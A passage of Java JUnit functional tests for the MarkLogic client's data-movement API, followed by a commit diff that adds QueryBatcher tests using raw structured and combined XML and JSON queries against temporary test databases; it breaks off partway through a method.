JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); String jobId = jobTicket.getJobId(); String jobName = jobTicket.getJobType().name(); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints2.xml")); // verify the Job and batch get method values. String[] batchDetailsArray = batchDetails.toString().split("\\|"); assertTrue("Job Batch Number not correct", Long.parseLong(batchDetailsArray[0]) > 0); assertTrue("Job Results So Far Number not correct", Long.parseLong(batchDetailsArray[1]) > 0); assertTrue("Forest Batch Number not correct", Long.parseLong(batchDetailsArray[2]) > 0); // Git Isue 124. For bytesMoved. assertTrue("Job Bytes Moved not correct", Long.parseLong(batchDetailsArray[3]) == 0); // verify the forest get method values. 
String[] forestDetailsArray = forestDetails.toString().split("\\|"); assertTrue("Database name returned from batch is not correct", forestDetailsArray[0].equalsIgnoreCase(dbName)); assertTrue("Forest name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[0]) || forestDetailsArray[2].equalsIgnoreCase(testMultipleForest[1])); // verify the job ticket get method values. This needs to be implemented. /*String[] jobTicketArray = jobDetails.toString().split("\\|"); assertTrue("Job Id returned from batch is not correct", jobTicketArray[0].equalsIgnoreCase(jobId)); assertTrue("Job Type name returned from batch is not correct", forestDetailsArray[2].equalsIgnoreCase(jobName));*/ } } catch (Exception e) { System.out.println("Exceptions thrown from Test testAndWordQueryWithMultipleForests"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); clientTmp.release(); } } /* * These are test methods that verify that different query types work. * Testing - * Word query * range query * value query */ @Test public void testDifferentQueryTypes() throws Exception { String testMultipleDB = "QBtestDifferentQueryTypesDB"; String[] testMultipleForest = {"QBtestDifferentQueryTypesDB-1"}; DatabaseClient clientTmp = null; DataMovementManager dmManagerTmp = null; try { System.out.println("Running testDifferentQueryTypes"); //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); // Setup constraints on DB and wait for indexes to setup. setupAppServicesConstraint(testMultipleDB); Thread.sleep(10000); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; ServerConfigurationManager srvMgr = client.newServerConfigManager(); srvMgr.readConfiguration(); srvMgr.setQueryOptionValidation(true); srvMgr.writeConfiguration(); clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); dmManagerTmp = clientTmp.newDataMovementManager(); QueryManager queryMgr = clientTmp.newQueryManager(); // create query def StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); StructuredQueryDefinition queryWorddef = qb.word(qb.element("id"), "0026"); //Use WriteBatcher to write the some files. WriteBatcher batcher = dmManagerTmp.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. 
String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/abs-range-constraint/batcher-contraints1.xml", contentHandle1); batcher.add("/abs-range-constraint/batcher-contraints2.xml", contentHandle2); batcher.add("/abs-range-constraint/batcher-contraints3.xml", contentHandle3); batcher.add("/abs-range-constraint/batcher-contraints4.xml", contentHandle4); batcher.add("/abs-range-constraint/batcher-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); //batcher.awaitCompletion(); StringBuilder batchWordResults = new StringBuilder(); StringBuilder batchWordFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(queryWorddef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchWordResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchWordFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher1.isStopped()) { // do nothing. } if (queryBatcher1.isStopped()) { if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. String[] res = batchWordResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 1, res.length); assertTrue("URI returned not correct", res[0].contains("/abs-range-constraint/batcher-contraints5.xml")); } // Run a range query. StructuredQueryDefinition queryRangedef = qb.range(qb.element("popularity"), "xs:integer", Operator.GE, 4); QueryBatcher queryBatcher2 = dmManagerTmp.newQueryBatcher(queryRangedef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchRangeResults = new ArrayList<String>(); StringBuilder batchRangeFailResults = new StringBuilder(); queryBatcher2.onUrisReady(batch-> { for (String str : batch.getItems()) { batchRangeResults.add(str); //batchRangeResults.append(str) //.append('|'); } }); queryBatcher2.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchRangeFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher2); bJobFinished = queryBatcher2.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher2.isStopped()) { // do nothing. 
      }

      if (queryBatcher2.isStopped()) {

         if (!batchRangeFailResults.toString().isEmpty() && batchRangeFailResults.toString().contains("Exceptions")) {
            fail("Test failed due to exceptions in testDifferentQueryTypes - Range Query");
         }

         // Verify the batch results now.
         assertTrue("No of documents returned in range query not correct", batchRangeResults.size() == 4);
         assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml"));
         assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints2.xml"));
         assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints4.xml"));
         assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints5.xml"));
      }

      // Run a ValueQueryOnAttribute query.
      StructuredQueryDefinition valuequeyDef = qb.value(qb.elementAttribute(qb.element(new QName("http://cloudbank.com", "price")), qb.attribute("amt")), "0.1");

      QueryBatcher queryBatcher3 = dmManagerTmp.newQueryBatcher(valuequeyDef);
      List<String> batchValueResults = new ArrayList<String>();
      StringBuilder batchvalueFailResults = new StringBuilder();

      queryBatcher3.onUrisReady(batch-> {
         for (String str : batch.getItems()) {
            batchValueResults.add(str);
         }
      });
      queryBatcher3.onQueryFailure(throwable-> {
         System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes");
         throwable.printStackTrace();
         batchvalueFailResults.append("Test has Exceptions");
      } );
      jobTicket = dmManagerTmp.startJob(queryBatcher3);
      bJobFinished = queryBatcher3.awaitCompletion(3, TimeUnit.MINUTES);

      while (!queryBatcher3.isStopped()) {
         // do nothing.
      }

      if (queryBatcher3.isStopped()) {

         if (!batchvalueFailResults.toString().isEmpty() && batchvalueFailResults.toString().contains("Exceptions")) {
            fail("Test failed due to exceptions in testDifferentQueryTypes - Value Query");
         }

         // Verify the batch results now. The value query should match only the first document written above.
         assertTrue("No of documents returned in value query not correct", batchValueResults.size() == 1);
         assertTrue("URI returned not correct", batchValueResults.contains("/abs-range-constraint/batcher-contraints1.xml"));
      }
    }
    catch (Exception e) {
      System.out.println("Exceptions thrown from Test testDifferentQueryTypes");
      System.out.println(e.getMessage());
    }
    finally {
      // Associate back the original DB.
      associateRESTServerWithDB(restServerName, dbName);
      detachForest(testMultipleDB, testMultipleForest[0]);
      deleteDB(testMultipleDB);
      deleteForest(testMultipleForest[0]);
      clientTmp.release();
      Thread.sleep(10000);
    }
  }
}
New Tests for Git #590
test-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java
New Tests for Git #590
<ide><path>est-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java <ide> import static org.junit.Assert.assertTrue; <ide> import static org.junit.Assert.fail; <ide> <add>import java.io.BufferedReader; <ide> import java.io.File; <ide> import java.io.FileInputStream; <add>import java.io.FileNotFoundException; <add>import java.io.FileReader; <add>import java.io.FileWriter; <ide> import java.io.IOException; <ide> import java.util.ArrayList; <ide> import java.util.Calendar; <ide> import java.util.List; <add>import java.util.TreeMap; <ide> import java.util.concurrent.TimeUnit; <add>import java.util.logging.Handler; <add>import java.util.logging.Level; <add>import java.util.logging.LogRecord; <add>import java.util.logging.Logger; <ide> <ide> import javax.xml.namespace.QName; <ide> import javax.xml.parsers.ParserConfigurationException; <ide> import javax.xml.transform.TransformerException; <ide> import javax.xml.xpath.XPathExpressionException; <ide> <add>import org.apache.logging.log4j.core.jmx.AppenderAdmin; <ide> import org.junit.After; <ide> import org.junit.AfterClass; <ide> import org.junit.Before; <ide> import org.junit.BeforeClass; <ide> import org.junit.Ignore; <ide> import org.junit.Test; <add>import org.w3c.dom.Document; <ide> import org.xml.sax.SAXException; <ide> <ide> import com.fasterxml.jackson.databind.JsonNode; <ide> import com.marklogic.client.DatabaseClientFactory; <ide> import com.marklogic.client.DatabaseClientFactory.Authentication; <ide> import com.marklogic.client.admin.ExtensionMetadata; <add>import com.marklogic.client.admin.QueryOptionsManager; <ide> import com.marklogic.client.admin.ServerConfigurationManager; <ide> import com.marklogic.client.admin.TransformExtensionsManager; <ide> import com.marklogic.client.datamovement.DataMovementManager; <ide> import com.marklogic.client.datamovement.Forest; <ide> import com.marklogic.client.datamovement.JobTicket; <ide> import com.marklogic.client.datamovement.QueryBatcher; <add>import com.marklogic.client.datamovement.UrisToWriterListener; <ide> import com.marklogic.client.datamovement.WriteBatcher; <ide> import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; <add>import com.marklogic.client.datamovement.impl.QueryBatcherImpl; <ide> import com.marklogic.client.document.JSONDocumentManager; <ide> import com.marklogic.client.document.ServerTransform; <ide> import com.marklogic.client.io.DOMHandle; <ide> import com.marklogic.client.io.Format; <ide> import com.marklogic.client.io.InputStreamHandle; <ide> import com.marklogic.client.io.JacksonHandle; <add>import com.marklogic.client.io.ReaderHandle; <ide> import com.marklogic.client.io.StringHandle; <ide> import com.marklogic.client.query.QueryManager; <ide> import com.marklogic.client.query.RawCombinedQueryDefinition; <add>import com.marklogic.client.query.RawStructuredQueryDefinition; <ide> import com.marklogic.client.query.StringQueryDefinition; <ide> import com.marklogic.client.query.StructuredQueryBuilder; <ide> import com.marklogic.client.query.StructuredQueryBuilder.Operator; <ide> // For use with QueryHostBatcher <ide> clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <ide> moveMgr = clientQHB.newDataMovementManager(); <add> <ide> } <ide> <ide> /** <ide> assertEquals("Batch Number","0", res[3]); <ide> } <ide> }*/ <add> <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be mixed in with a StructuredQueryBuilder 
<add> * @throws Exception <add> * <add> * TODO modify this test for Git 591, once 591 is fixed/addressed. <add> * <add> */ <add> @Ignore <add> public void testRawStructuredQDWithQueryBuilder() throws Exception <add> { <add> String testMultipleDB = "RawStrutdQDWithQBuilderDB"; <add> String[] testMultipleForest = {"RawStrutdQDWithQBuilderDB-1", "RawStrutdQDWithQBuilderDB-2", "RawStrutdQDWithQBuilderDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> FileWriter writer = null; <add> BufferedReader UriReaderTxt = null; <add> FileReader freader = null; <add> String fileName = "RawStrutdQDWithQBuilderDB.txt"; <add> <add> try { <add> System.out.println("Running testRawStructuredQDWithQueryBuilder"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"curbappeal.xml", "flipper.xml", "justintime.xml"}; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); <add> String options = <add> "<options xmlns=\"http://marklogic.com/appservices/search\">" + <add> "<constraint name='industry'>"+ <add> "<value>"+ <add> "<element name='industry' ns=''/>"+ <add> "</value>"+ <add> "</constraint>"+ <add> "</options>"; <add> <add> RawStructuredQueryDefinition rsq = qb.build(qb.term("neighborhoods"), <add> qb.valueConstraint("industry", "Real Estate")); <add> String comboquery = "<search xmlns=\"http://marklogic.com/appservices/search\">" + <add> rsq.toString() + options + <add> "</search>"; <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition((new StringHandle(comboquery)).withFormat(Format.XML)); <add> <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. 
<add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> queryBatcher1.withBatchSize(1); <add> writer = new FileWriter(fileName); <add> <add> queryBatcher1.onUrisReady(new UrisToWriterListener(writer)) <add> .onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> writer.flush(); <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> freader = new FileReader(fileName); <add> UriReaderTxt = new BufferedReader(freader); <add> TreeMap<String, String> expectedMap = new TreeMap<String, String>(); <add> TreeMap<String, String> uriMap = new TreeMap<String, String>(); <add> expectedMap.put(filenames[0], "URI"); <add> expectedMap.put(filenames[1], "URI"); <add> String line = null; <add> <add> while ((line = UriReaderTxt.readLine()) != null) { <add> System.out.println("Line read from file with URIS is" + line); <add> uriMap.put(line, "URI"); <add> } <add> assertTrue("URIs not read correctly from testRawStructuredQDWithQueryBuilder method ", expectedMap.equals(uriMap)); <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from Test testRawStructuredQDWithQueryBuilder"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> try { <add> if (writer != null) <add> writer.close(); <add> if (UriReaderTxt != null) <add> UriReaderTxt.close(); <add> if (freader != null) freader.close(); <add> // Delete the file on JVM exit <add> File file = new File(fileName); <add> file.deleteOnExit(); <add> } catch (Exception e) { <add> // TODO Auto-generated catch block <add> e.printStackTrace(); <add> } <add> <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher <add> * Store options from a file to server. <add> * Read a query from a file into a handle <add> * Create a RawCombinedQueryDefinition from handle and options, to be used in QueryBatcher Job. 
<add> * <add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryXMLWithWriteOptions() throws Exception <add> { <add> String testMultipleDB = "RawCombinedQueryXMLDB"; <add> String[] testMultipleForest = {"RawCombinedQueryXMLDB-1", "RawCombinedQueryXMLDB-2", "RawCombinedQueryXMLDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryXMLWithWriteOptions"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; <add> String queryOptionFileName = "valueConstraintWithoutIndexSettingsAndNSOpt.xml"; <add> <add> String queryName = "combinedQueryNoOption.xml"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> InputStreamHandle contentHandle4 = new InputStreamHandle(); <add> contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); <add> InputStreamHandle contentHandle5 = new InputStreamHandle(); <add> contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> wbatcher.add(filenames[3], contentHandle4); <add> wbatcher.add(filenames[4], contentHandle5); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> setQueryOption(clientTmp, queryOptionFileName); <add> // get the combined query <add> File file = new File(combQueryFileDir+queryName); <add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.XML); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle, queryOptionFileName); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. 
<add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 1, res.length); <add> assertTrue("URI returned not correct", res[0].contains(filenames[4])); <add> <add> // Read the document and assert on the value <add> DOMHandle contentHandle = new DOMHandle(); <add> contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); <add> Document readDoc = contentHandle.get(); <add> System.out.println(convertXMLDocumentToString(readDoc)); <add> <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryXMLWithWriteOptions"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher - JSON file <add> * Read a query from a combined file into a handle. combinedQueryOptionJSON.json contains query, options in JSON format. 
<add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryJSON() throws Exception <add> { <add> String testMultipleDB = "RawCombinedRangeJsonDB"; <add> String[] testMultipleForest = {"RawCombinedRangeJsonDB-1", "RawCombinedRangeJsonDB-2", "RawCombinedRangeJsonDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryJSON"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; <add> String combinedQueryFileName = "combinedQueryOptionJSON.json"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> InputStreamHandle contentHandle4 = new InputStreamHandle(); <add> contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); <add> InputStreamHandle contentHandle5 = new InputStreamHandle(); <add> contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> wbatcher.add(filenames[3], contentHandle4); <add> wbatcher.add(filenames[4], contentHandle5); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> // get the combined query <add> File file = new File(combQueryFileDir+combinedQueryFileName); <add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.JSON); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. 
<add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 1, res.length); <add> assertTrue("URI returned not correct", res[0].contains(filenames[4])); <add> <add> // Read the document and assert on the value <add> DOMHandle contentHandle = new DOMHandle(); <add> contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); <add> Document readDoc = contentHandle.get(); <add> System.out.println(convertXMLDocumentToString(readDoc)); <add> <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryJSONWithWriteOptions"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher - Combined file <add> * Read a query from a combined file into a handle. <add> * Create a RawCombinedQueryDefinition from handle, to be used in QueryBatcher Job. 
<add> * <add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryPathIndex() throws Exception <add> { <add> String testMultipleDB = "RawCombinedRangePathDB"; <add> String[] testMultipleForest = {"RawCombinedRangePathDB-1", "RawCombinedRangePathDB-2", "RawCombinedRangePathDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryPathIndex"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"pathindex1.xml", "pathindex2.xml"}; <add> String combinedQueryFileName = "combinedQueryOptionPathIndex.xml"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> // get the combined query <add> File file = new File(combQueryFileDir+combinedQueryFileName); 